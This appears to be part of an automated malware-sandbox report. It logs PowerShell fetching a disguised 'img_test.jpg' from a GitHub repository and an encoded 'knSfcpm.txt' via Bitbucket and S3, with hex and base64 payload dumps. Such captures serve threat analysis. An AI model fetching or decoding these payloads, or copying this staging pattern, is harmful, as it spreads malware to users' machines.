                                                                                                                                                                                        2024-10-10 11:39:42 UTC2387INData Raw: 41 41 41 51 41 41 41 45 38 77 56 77 78 41 41 41 41 77 53 34 44 41 58 49 41 41 42 50 63 68 32 45 64 41 58 59 4b 33 4e 45 64 43 67 2f 67 6b 51 43 52 4c 69 42 37 44 4f 46 6b 41 41 41 41 41 59 43 74 4e 43 39 36 41 41 45 38 73 56 52 69 51 61 47 41 41 41 41 41 6d 51 62 6a 44 76 46 47 45 50 49 42 73 50 49 77 78 41 51 51 43 77 56 46 2f 44 41 51 77 54 48 4a 45 63 4d 41 41 63 46 6f 6f 54 43 42 4a 69 51 55 4a 75 43 64 4a 58 34 37 31 68 41 55 4c 71 64 4f 51 73 49 30 4a 71 42 64 53 58 59 77 4a 43 67 64 4e 75 77 36 4a 48 7a 4a 30 42 63 68 45 77 65 72 54 67 44 67 41 41 45 38 73 46 4b 41 42 4a 41 4e 56 38 50 41 41 42 50 64 6b 51 77 78 51 43 41 41 41 41 67 4a 30 32 34 77 62 42 63 4d 59 51 38 67 50 55 48 77 46 43 43 4a 63 74 49 41 41 42 50 63 68 69 42 37 44 4f 46 41 6d 51
                                                                                                                                                                                        Data Ascii: AAAQAAAE8wVwxAAAAwS4DAXIAABPch2EdAXYK3NEdCg/gkQCRLiB7DOFkAAAAAYCtNC96AAE8sVRiQaGAAAAAmQbjDvFGEPIBsPIwxAQQCwVF/DAQwTHJEcMAAcFooTCBJiQUJuCdJX471hAULqdOQsI0JqBdSXYwJCgdNuw6JHzJ0BchEwerTgDgAAE8sFKABJANV8PAABPdkQwxQCAAAAgJ024wbBcMYQ8gPUHwFCCJctIAABPchiB7DOFAmQ
                                                                                                                                                                                        2024-10-10 11:39:42 UTC9734INData Raw: 49 44 6b 77 56 69 45 4d 56 69 49 73 55 69 41 41 45 38 63 31 78 41 55 51 43 56 4c 4b 63 52 50 41 43 4a 4d 74 49 41 41 41 41 42 34 43 41 41 41 41 6b 75 43 67 2f 67 51 61 32 77 66 35 31 57 77 51 38 67 42 41 41 51 77 6a 56 42 44 43 52 64 37 4c 65 72 54 67 44 67 38 44 56 6a 49 51 33 76 69 50 49 77 51 31 49 4b 6b 51 30 69 41 41 41 41 4c 53 34 44 41 58 49 44 73 50 49 41 42 4a 41 64 56 38 50 4a 45 6b 49 42 6b 51 56 69 41 41 41 41 63 67 41 4a 45 64 4d 46 6b 51 56 6a 4d 6f 42 52 4a 79 77 52 44 41 41 51 77 7a 56 46 4c 43 41 41 4b 55 44 36 41 41 41 41 41 41 77 78 51 67 58 69 59 48 67 41 6a 48 73 74 63 30 49 41 41 42 50 58 68 43 41 41 41 63 50 68 50 41 63 68 48 6e 49 41 41 6b 67 47 6f 54 43 48 4a 4b 65 64 78 6e 44 46 41 50 59 41 42 50 49 41 41 41 77 67 43 65 72 54 67
                                                                                                                                                                                        Data Ascii: IDkwViEMViIsUiAAE8c1xAUQCVLKcRPACJMtIAAAAB4CAAAAkuCg/gQa2wf51WwQ8gBAAQwjVBDCRd7LerTgDg8DVjIQ3viPIwQ1IKkQ0iAAAALS4DAXIDsPIABJAdV8PJEkIBkQViAAAAcgAJEdMFkQVjMoBRJywRDAAQwzVFLCAAKUD6AAAAAAwxQgXiYHgAjHstc0IAABPXhCAAAcPhPAchHnIAAkgGoTCHJKedxnDFAPYABPIAAAwgCerTg


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        3192.168.2.949845185.199.110.1334431280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-10 11:39:52 UTC117OUTGET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1
                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        2024-10-10 11:39:52 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 2578503
                                                                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                        ETag: "ba4b733aa1ad403bc9cacb2a172994a886bea7b08e7a7dfb33ae1618861cbf3e"
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                        X-GitHub-Request-Id: EF8C:D4BA7:61E47E:694A5F:6707B6AB
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Date: Thu, 10 Oct 2024 11:39:52 GMT
                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740034-EWR
                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                                                                        X-Timer: S1728560393.788495,VS0,VE4
                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                        X-Fastly-Request-ID: 702a5c402866d01098577d59a11a7dc02839d35a
                                                                                                                                                                                        Expires: Thu, 10 Oct 2024 11:44:52 GMT
                                                                                                                                                                                        Source-Age: 16
                                                                                                                                                                                        2024-10-10 11:39:52 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e1 00 16 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 00 00 00 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 00 09 0a ff c4 00 5f 10 00 01 03 03 03 02 04 03 06 04 03 06 03 01 01 21 01
                                                                                                                                                                                        Data Ascii: JFIF,,ExifMM*CCp"_!
                                                                                                                                                                                        2024-10-10 11:39:52 UTC16384INData Raw: c1 dc 0f e7 54 ac a7 04 aa 69 93 0d 3f c8 ef 4f ad ee 14 a4 41 54 fa 54 33 17 52 07 30 45 3a b7 b8 d8 48 93 3d e7 bd 54 9d 4c 96 32 c1 32 97 0a 76 9d c2 97 69 ed c9 24 1e 47 1f 5a 8a 45 cc ab 69 3e c0 f6 a5 db 7f 6f f5 4a 63 f5 a8 1c 19 2a 91 2a 9b 84 84 8f 9b 9e f1 e9 47 45 c4 a8 ca b8 f5 a8 d4 3a 95 81 07 bf 95 28 9b 9e 7e 6f c3 40 eb 13 91 22 ab 94 88 04 f6 ff 00 bf ca 8c 1f 49 50 83 51 ad dc c4 a8 11 1e 46 79 a3 0b a3 f8 89 24 9f 2a 1f 6d 8f bb 82 47 c4 e1 26 7b 8a 37 8d b8 f0 79 a8 c1 7c 79 98 03 b0 a1 6e f7 c3 59 25 44 f1 e9 4d ed 0d b8 93 37 02 48 04 11 41 f7 84 ef 1c 0a 8c 5d ee d3 09 30 26 8a e6 43 6f 3d 88 f4 34 5e d0 9c 91 2a 6e 40 02 48 04 fb d1 d1 76 15 b7 d3 91 de a1 55 7e 48 9f 33 e6 0f 7a f3 79 12 99 12 62 9d c1 f6 1f 71 3b f7 89 4f 04 49
                                                                                                                                                                                        Data Ascii: Ti?OATT3R0E:H=TL22vi$GZEi>oJc**GE:(~o@"IPQFy$*mG&{7y|ynY%DM7HA]0&Co=4^*n@HvU~H3zybq;OI
                                                                                                                                                                                        2024-10-10 11:39:52 UTC16384INData Raw: ee 11 86 b3 f0 dd 64 da 9d ca 42 52 ea 8a 54 b0 82 b0 a0 14 95 19 94 d7 46 7c 58 2f 22 9f 84 ae a2 2f 12 19 5d c3 18 c4 5c 3a b7 4f fc 26 5b b8 69 6b 5a 7f e7 48 1b 87 b8 35 15 f6 73 fd e2 c7 e0 7f 08 ab 97 1a 52 6e f3 b9 35 b2 a4 24 a4 94 07 12 83 bf d4 85 25 40 1f 48 ae 66 fd 23 fa 95 51 b1 4d eb da 76 be e6 15 aa fe 24 32 5f 66 c7 56 ad f4 16 98 c7 e7 75 ed 86 ae bd b3 c8 2e d3 2b 6c e5 ad c6 18 b8 b7 1b 79 a4 6c 0a 0b 2e 27 c3 5a 16 14 a4 43 73 07 92 3b 8b 21 78 a1 70 e2 00 80 d9 29 22 79 11 c5 62 7f 10 5f 0c 2e 75 f7 aa 9a 1f 3f 75 ad b3 58 dc 36 8e ba 17 c7 0a c5 b3 2a 17 0f 21 40 a0 b6 f4 05 a5 2a 81 bd 2b 2a 4f f8 42 49 35 b1 37 75 e2 ac a9 64 ab 7a 8c c7 69 26 4d 6b 69 34 be da d9 8e 11 9b 76 a7 dc e4 59 ab b2 be d2 01 11 3e 94 bb 57 bb 14 90 ad
                                                                                                                                                                                        Data Ascii: dBRTF|X/"/]\:O&[ikZH5sRn5$%@Hf#QMv$2_fVu.+lyl.'ZCs;!xp)"yb_.u?uX6*!@*+*OBI57udzi&Mki4vY>W
                                                                                                                                                                                        2024-10-10 11:39:53 UTC16384INData Raw: bc 9e 7d e9 74 c1 49 14 84 1d b4 c2 7f bd 28 d7 24 44 4c 52 68 32 83 f4 a3 36 7d e9 9a 09 0b 91 f2 f1 da 8f 33 20 0f 3a 49 0a dc 91 cc 45 1d be 41 f2 9a 01 b0 1c 18 13 e9 da 8e 15 22 28 80 42 23 be de 79 a3 02 26 09 32 69 0c 2c da b7 0a 13 02 4f 98 a4 90 36 40 99 e3 b5 19 d5 84 83 48 47 96 ad e4 89 ec 79 a4 dc ef c1 ef ef 42 55 03 bf 7a 4d 67 6c 9e d4 84 02 cf 3c f9 f1 44 24 a4 7d 3d e8 54 7e 69 9a 4d 4a 04 19 31 48 74 8f 28 6e 5f 97 6a 24 42 bf 2a 1d e0 1e f1 3e f4 02 24 f2 aa 41 20 5b e5 44 d1 f8 06 88 9f 94 c7 26 80 ac 7f d9 a2 51 7d c5 91 6d c9 83 cf f9 50 20 c2 07 03 f3 34 8a 94 22 09 fc a8 a5 d2 8e 0f 97 ef 44 36 e1 72 b9 48 1e 60 cd 11 63 9f f5 a4 f7 85 1f 31 f9 d0 82 37 0e 4c d3 8b 20 80 37 11 c4 11 5e d8 3d c5 00 e1 53 24 f1 da 8c 0f cb 48 24 11
                                                                                                                                                                                        Data Ascii: }tI($DLRh26}3 :IEA"(B#y&2i,O6@HGyBUzMgl<D$}=T~iMJ1Ht(n_j$B*>$A [D&Q}mP 4"D6rH`c17L 7^=S$H$
                                                                                                                                                                                        2024-10-10 11:39:53 UTC16384INData Raw: d2 10 8a db f4 3d a9 25 27 6a a6 48 f6 a7 1c 05 77 06 91 75 3b a3 93 e5 48 42 31 22 81 07 f1 0f 43 42 55 dc 44 f9 c7 ad 02 88 0d c8 90 2a 4c 11 80 eb 7b 81 3e 83 b5 22 a0 76 81 cf 1d e9 c6 e1 bb b8 ed 49 38 21 5e c3 8a 42 11 52 41 9f 29 f3 f3 34 99 4c 27 76 e0 48 f3 f2 a5 ca 79 9a 4c a3 8d be b3 cd 21 09 28 6e 57 1e 7c 9e e6 69 25 ae 57 e4 4f a4 d2 b0 52 a2 7e 6f 9b f4 14 0b 6f 92 60 70 79 33 da 90 82 09 28 f4 93 1f 4a f2 9a 32 61 40 1a 10 41 44 09 f9 79 98 a5 54 92 a6 e7 ca 29 08 62 ea 08 31 34 92 d8 dc 48 9e d4 f5 68 ed 22 3f ce 92 2c 89 30 0c 11 eb 48 43 64 32 48 3f 31 83 43 e1 10 3f 11 3c 53 80 d9 6d 27 8e 05 79 40 2b ca 89 31 0c d6 df cb cf 73 48 5c 37 c0 83 4f cb 5b c7 00 09 f7 a4 2e 18 84 c0 1d 8d 3e 50 f8 22 56 d1 dc 60 c8 8a f3 4c 02 64 85 76 f5
                                                                                                                                                                                        Data Ascii: =%'jHwu;HB1"CBUD*L{>"vI8!^BRA)4L'vHyL!(nW|i%WOR~oo`py3(J2a@ADyT)b14Hh"?,0HCd2H?1C?<Sm'y@+1sH\7O[.>P"V`Ldv
                                                                                                                                                                                        2024-10-10 11:39:53 UTC16384INData Raw: 09 04 d1 25 90 1b 00 c0 ed da 2b c9 05 68 33 3c 79 7a d1 c3 20 1e 00 30 3d 68 c1 bd a0 f0 49 06 94 be 02 4c f3 69 10 27 c8 50 ab 94 24 f7 34 64 26 79 83 cf 14 45 c2 4f d7 de 98 76 37 75 25 43 82 45 35 bb 44 c0 fe a3 da 3b d3 a5 cc a8 08 14 d5 fe 55 10 47 1d e8 d9 18 c5 f4 14 a6 08 90 ae dc d2 7b 3b 19 2a f6 98 9a 70 f7 cd 3b a0 8f 38 a4 56 13 22 48 93 df eb 52 47 b0 84 97 dc 82 ae 0f 7f 6a 49 d1 fc ae 0c 1a 59 5d c8 ed 23 d6 93 71 09 2a e4 13 23 d6 8e 22 1b 38 de fe d1 f5 9a 6e e3 60 26 26 63 f6 a7 e5 b4 a4 a8 01 1e 46 93 76 d9 21 31 b7 f7 a2 23 79 6f 24 6b 9c 93 e7 e7 48 b8 9d a2 3b 03 df 9a 7e f5 a8 49 84 a4 c0 a4 97 6a 9d a4 11 c1 ed 4e 9e 05 f7 0c d5 29 57 92 53 eb 40 20 02 0f 98 9a 70 ed b4 08 e0 80 68 aa 68 48 e3 e5 07 81 45 90 e2 27 22 07 33 3e f4
                                                                                                                                                                                        Data Ascii: %+h3<yz 0=hILi'P$4d&yEOv7u%CE5D;UG{;*p;8V"HRGjIY]#q*#"8n`&&cFv!1#yo$kH;~IjN)WS@ phhHE'"3>
                                                                                                                                                                                        2024-10-10 11:39:53 UTC16384INData Raw: a3 4d 85 13 cc 45 2c 86 52 85 70 7c ea 36 c4 79 bb 70 04 13 1c 52 a9 6a 10 93 c7 1f bd 0a 00 31 c9 fd 29 46 a3 64 f9 54 61 e0 f2 b8 04 82 04 0a 4d d4 6e 51 20 47 b1 a5 c0 0b 07 83 44 71 02 7b f2 07 34 cd 8b 08 8d 7d a5 02 7b 73 4c 9e 6a 67 cc 7e f5 2c fa 06 e8 91 f5 a6 8b b7 f1 56 66 67 ca 9b 70 db 48 d3 68 44 f6 83 45 56 3e 4c 83 cd 49 fd cc 15 00 27 8a 59 18 f9 24 73 07 8a 2d c2 da 41 a7 14 12 e2 41 04 fb 9a 5c e3 82 62 23 9f 4e d5 33 fc 34 40 20 50 a6 c3 78 ed 1c cd 33 98 db 59 18 cd 8e e1 4e 19 b2 22 78 04 45 3f fb 90 4f 60 7b d2 cd 5a 02 ae dd cd 0e 58 4a 24 72 2d 02 11 20 73 da 8c 6d c2 f8 02 a4 15 66 90 aa 20 b7 04 c0 1e f4 c3 8c 3e ea 3b 8e 49 e7 8a 6d 70 cc 48 00 99 a9 55 31 ea a9 1e 9d a9 05 b5 c1 11 c7 bd 21 10 b7 4c 14 fb 93 cc 47 14 c5 e4 19
                                                                                                                                                                                        Data Ascii: ME,Rp|6ypRj1)FdTaMnQ GDq{4}{sLjg~,VfgpHhDEV>LI'Y$s-AA\b#N34@ Px3YN"xE?O`{ZXJ$r- smf >;ImpHU1!LG
                                                                                                                                                                                        2024-10-10 11:39:53 UTC16384INData Raw: e7 ce 80 42 2e 18 27 b7 04 d2 3b 64 79 52 ae a3 e6 89 33 e9 eb 5e 2d ed 40 05 5c cc 52 ca 10 dc b5 e9 45 f0 38 1e 67 f3 a7 0a 41 50 e3 9f 3e 28 c8 67 cd 47 e5 fd 29 08 69 e0 93 fd 3c 1f 5a 2b d6 68 29 f9 84 93 cf 7a 7b e0 24 2b 92 01 ed cf 9d 03 8c 48 8a 7c 8d b4 89 7a cc 15 76 e6 22 85 ab 4e 76 80 0e ea 7e a6 21 66 38 81 e4 28 10 da 64 12 09 52 47 6a 7d c0 e1 89 b3 60 14 04 8f 7e f4 55 e3 e0 9e 09 9f 7a 78 d2 42 47 13 df cf eb 4e ad 2d c3 e7 92 3e 62 69 9b 1f 04 13 d6 45 21 3c 6e 23 b0 35 13 7d 66 77 13 b7 b1 9a b9 64 71 41 9d a6 49 e4 f9 fe 95 0f 79 66 99 50 8e fe f3 34 f1 9f 20 b4 55 de 6b 6b 9b 60 47 ac d3 4b 86 c8 90 90 09 35 37 75 60 12 e1 27 8f af 95 47 dc b0 36 aa 0c c7 9d 4f 16 0b 44 2d ca 76 28 81 cc 53 37 49 93 d8 d4 95 fb 61 05 46 62 45 30 78
                                                                                                                                                                                        Data Ascii: B.';dyR3^-@\RE8gAP>(gG)i<Z+h)z{$+H|zv"Nv~!f8(dRGj}`~UzxBGN->biE!<n#5}fwdqAIyfP4 Ukk`GK57u`'G6OD-v(S7IaFbE0x
                                                                                                                                                                                        2024-10-10 11:39:53 UTC16384INData Raw: ea 25 50 07 04 0f 3a aa b1 fc b5 a4 83 0a ee 26 a5 2c 2f 52 d2 c9 33 00 f9 1a ab 38 64 24 d1 77 b7 c9 05 26 65 5c f3 c5 3d 6f 36 52 13 c9 3c f9 55 49 9c 9c 1e e7 e9 26 9d ff 00 12 f9 78 3c 81 55 bd a0 94 89 f7 f2 c5 e1 dc f1 ef 4c ae 32 44 72 0c 8f 39 f3 35 1b fc 44 84 72 66 91 7e ea 52 76 c9 8e 67 d6 ac 42 ac 01 29 a0 d9 8b e2 ab 75 12 40 1e 60 56 5f d4 3b 51 71 6a a7 0f 21 29 3c 4d 5e b3 17 72 db 80 91 c8 20 7a d6 6b d4 6c a9 63 1c b9 23 b1 1c 57 4f d1 ab 7b d1 97 ad 9a d8 d9 8f 6b 0c c9 62 79 4a 52 3b 7d 2a 89 95 b9 55 db 85 44 98 f6 ed 53 da a0 2a f6 ed c3 32 27 d6 a2 45 82 bc e0 88 e7 de bd 63 47 15 08 a6 70 5a b9 39 49 b2 ba eb 04 89 09 83 31 04 d1 85 99 92 20 f1 ef 56 4b 6c 22 56 20 20 12 7d a6 97 fe 04 59 04 f8 41 47 d7 d2 b5 16 a1 14 55 52 7c 95
                                                                                                                                                                                        Data Ascii: %P:&,/R38d$w&e\=o6R<UI&x<UL2Dr95Drf~RvgB)u@`V_;Qqj!)<M^r zklc#WO{kbyJR;}*UDS*2'EcGpZ9I1 VKl"V }YAGUR|
                                                                                                                                                                                        2024-10-10 11:39:53 UTC16384INData Raw: 61 76 96 c5 2a 41 07 bf 9d 67 fa af 01 f7 70 a3 b4 48 fe a9 31 5b da 2b a3 64 b0 8c 9b ea 94 56 46 97 79 b6 1f 3f 2a a2 7d 4f 7a 67 70 fb 0f a8 90 a4 cf ae ee c2 a2 92 10 90 a3 06 0f 79 34 93 c9 10 63 88 e4 f3 de ba 1a ea c6 0c 9b 27 91 67 51 04 ed 20 8f 3e 69 a3 ad 6e 33 cf 3c d1 dc 41 50 03 b4 f6 13 c5 37 75 b7 12 01 f9 8f d0 f6 ab 71 e0 81 ae 0f 2d 2a 27 f1 f3 eb 44 f0 16 4f 72 01 a5 ed db 52 91 11 df d8 cd 2e d5 ae d5 18 80 a3 c8 07 91 53 2e c4 72 42 0d 32 a4 ab 70 54 47 10 29 68 56 ef ad 38 65 21 07 b4 cd 2c 84 a5 46 02 39 ee 3d 29 dc f0 44 e0 35 46 e4 24 cc c9 06 20 d2 4a bb 71 6b 22 0c 7b f7 35 28 96 01 f2 81 db ff 00 35 26 fd 92 66 21 26 7d 3d 69 46 6b 23 35 e0 8f 5b ae 2d 12 49 f9 7d 4d 0b 2a 59 03 99 04 7d 29 e2 f1 46 e3 e6 42 80 03 d3 9a 4e e2
                                                                                                                                                                                        Data Ascii: av*AgpH1[+dVFy?*}Ozgpy4c'gQ >in3<AP7uq-*'DOrR.S.rB2pTG)hV8e!,F9=)D5F$ Jqk"{5(5&f!&}=iFk#5[-I}M*Y})FBN


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        4192.168.2.949871185.166.143.494431280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-10 11:39:57 UTC95OUTGET /fwfsfw/fwf/downloads/knSfcpm.txt HTTP/1.1
                                                                                                                                                                                        Host: bitbucket.org
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        2024-10-10 11:39:57 UTC5133INHTTP/1.1 302 Found
                                                                                                                                                                                        Date: Thu, 10 Oct 2024 11:39:57 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Server: AtlassianEdge
                                                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/ac2e731e-5312-4ee4-9296-cae86cebf978/downloads/30826a14-694e-4d25-a618-76f4522de60d/knSfcpm.txt?response-content-disposition=attachment%3B%20filename%3D%22knSfcpm.txt%22&AWSAccessKeyId=ASIA6KOSE3BNEYE44CC7&Signature=qVDX1X76daXyLZfHGVoMf2HQK3Y%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMSJIMEYCIQCbxY5rk%2F7BhoCD%2FL4%2FW1l8cyavKuhg7UvCSoXCbsRKMAIhAPdUNixjDUn6L1I4X16TZGwMrmvTOQKWGNbb2Ili37VFKqcCCHUQABoMOTg0NTI1MTAxMTQ2IgyxHRS5pJpn1YkembkqhAIAB6cuSDC%2Fgvl9FFzwT%2BTJwITs01eaheFjzkPHMRgLVBDTdkbkCKusB%2FIPVwyq6%2FnzFHcE2k9OUVlqYO2N6gKOWgzDiVl7l8f6YaiCPXGCLofmuIqK9ZWruIzcTg6m0t2Jl47mxwO2YxPNhm%2FkR8TR2phu6LTgLc8CFqkdDSTdBNdm%2BGM5D7jhmn9gBT403MRilEZ9ypQTRlLYoXOk5%2BjkRH4EuELoJPhaXhp746fpML8Ho1iacudfwH2UPSkb6XUhD4DX6%2B4XP%2Fv%2BzotYguR8UYXjVsYH3nGoBDwdxzOssabe%2Fo273jnhZQ%2Bg86LtTGTq4SLTJPhFzIms7BiQe%2Bsucwp1eDDa%2BZ64BjqcAS%2FWXt8NZhhqHLkEjCmKgcEOcZCkfBLcI7zGI0fVCjHvtSyf%2BceWo5nS3AWjRYiWZmuecet%2By84hiQnPVrQ2Lqj9nmEehVUnVFlh4ZeUFzzJg0jMRGBeHnhjhzm1egZ [TRUNCATED]
                                                                                                                                                                                        Expires: Thu, 10 Oct 2024 11:39:57 GMT
                                                                                                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                        X-Used-Mesh: False
                                                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                        X-Dc-Location: Micros-3
                                                                                                                                                                                        X-Served-By: e38dd5ee7642
                                                                                                                                                                                        X-Version: e70d6aec7847
                                                                                                                                                                                        X-Static-Version: e70d6aec7847
                                                                                                                                                                                        X-Request-Count: 3118
                                                                                                                                                                                        X-Render-Time: 0.05032014846801758
                                                                                                                                                                                        X-B3-Traceid: f20ea24e240e4410ae73f4a55484a4bc
                                                                                                                                                                                        X-B3-Spanid: 4c0eb96a215580c3
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        Content-Security-Policy: base-uri 'self'; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss: [TRUNCATED]
                                                                                                                                                                                        X-Usage-Quota-Remaining: 999059.846
                                                                                                                                                                                        X-Usage-Request-Cost: 955.33
                                                                                                                                                                                        X-Usage-User-Time: 0.028072
                                                                                                                                                                                        X-Usage-System-Time: 0.000588
                                                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                                                        Age: 0
                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                        Atl-Traceid: f20ea24e240e4410ae73f4a55484a4bc
                                                                                                                                                                                        Atl-Request-Id: f20ea24e-240e-4410-ae73-f4a55484a4bc
                                                                                                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                        Server-Timing: atl-edge;dur=164,atl-edge-internal;dur=6,atl-edge-upstream;dur=159,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                                                        Connection: close


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        5192.168.2.9498793.5.10.1964431280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-10 11:39:58 UTC1173OUTGET /ac2e731e-5312-4ee4-9296-cae86cebf978/downloads/30826a14-694e-4d25-a618-76f4522de60d/knSfcpm.txt?response-content-disposition=attachment%3B%20filename%3D%22knSfcpm.txt%22&AWSAccessKeyId=ASIA6KOSE3BNEYE44CC7&Signature=qVDX1X76daXyLZfHGVoMf2HQK3Y%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMSJIMEYCIQCbxY5rk%2F7BhoCD%2FL4%2FW1l8cyavKuhg7UvCSoXCbsRKMAIhAPdUNixjDUn6L1I4X16TZGwMrmvTOQKWGNbb2Ili37VFKqcCCHUQABoMOTg0NTI1MTAxMTQ2IgyxHRS5pJpn1YkembkqhAIAB6cuSDC%2Fgvl9FFzwT%2BTJwITs01eaheFjzkPHMRgLVBDTdkbkCKusB%2FIPVwyq6%2FnzFHcE2k9OUVlqYO2N6gKOWgzDiVl7l8f6YaiCPXGCLofmuIqK9ZWruIzcTg6m0t2Jl47mxwO2YxPNhm%2FkR8TR2phu6LTgLc8CFqkdDSTdBNdm%2BGM5D7jhmn9gBT403MRilEZ9ypQTRlLYoXOk5%2BjkRH4EuELoJPhaXhp746fpML8Ho1iacudfwH2UPSkb6XUhD4DX6%2B4XP%2Fv%2BzotYguR8UYXjVsYH3nGoBDwdxzOssabe%2Fo273jnhZQ%2Bg86LtTGTq4SLTJPhFzIms7BiQe%2Bsucwp1eDDa%2BZ64BjqcAS%2FWXt8NZhhqHLkEjCmKgcEOcZCkfBLcI7zGI0fVCjHvtSyf%2BceWo5nS3AWjRYiWZmuecet%2By84hiQnPVrQ2Lqj9nmEehVUnVFlh4ZeUFzzJg0jMRGBeHnhjhzm1egZquLIpCccG6Ij8jV2eP3B9qMJOaPoilCh5ZtmM%2Fi6Kd [TRUNCATED]
                                                                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        2024-10-10 11:39:58 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                        x-amz-id-2: wqr75Roj+GOCPaEs/yfq4c/wxgnplU7FA/VCxF9rNGBdrwzkITD2a2LGFfeU9yivdB1bAnzGmJDuYcTYq104jA==
                                                                                                                                                                                        x-amz-request-id: 1C1RRPT2JZR4H106
                                                                                                                                                                                        Date: Thu, 10 Oct 2024 11:39:59 GMT
                                                                                                                                                                                        Last-Modified: Thu, 10 Oct 2024 03:03:20 GMT
                                                                                                                                                                                        ETag: "facba053354b90a0952001ae56181ec6"
                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                        x-amz-version-id: zJC50QTv_g5DFBkcrd664buF4C1KRcMP
                                                                                                                                                                                        Content-Disposition: attachment; filename="knSfcpm.txt"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                        Content-Length: 700316
                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                        Connection: close
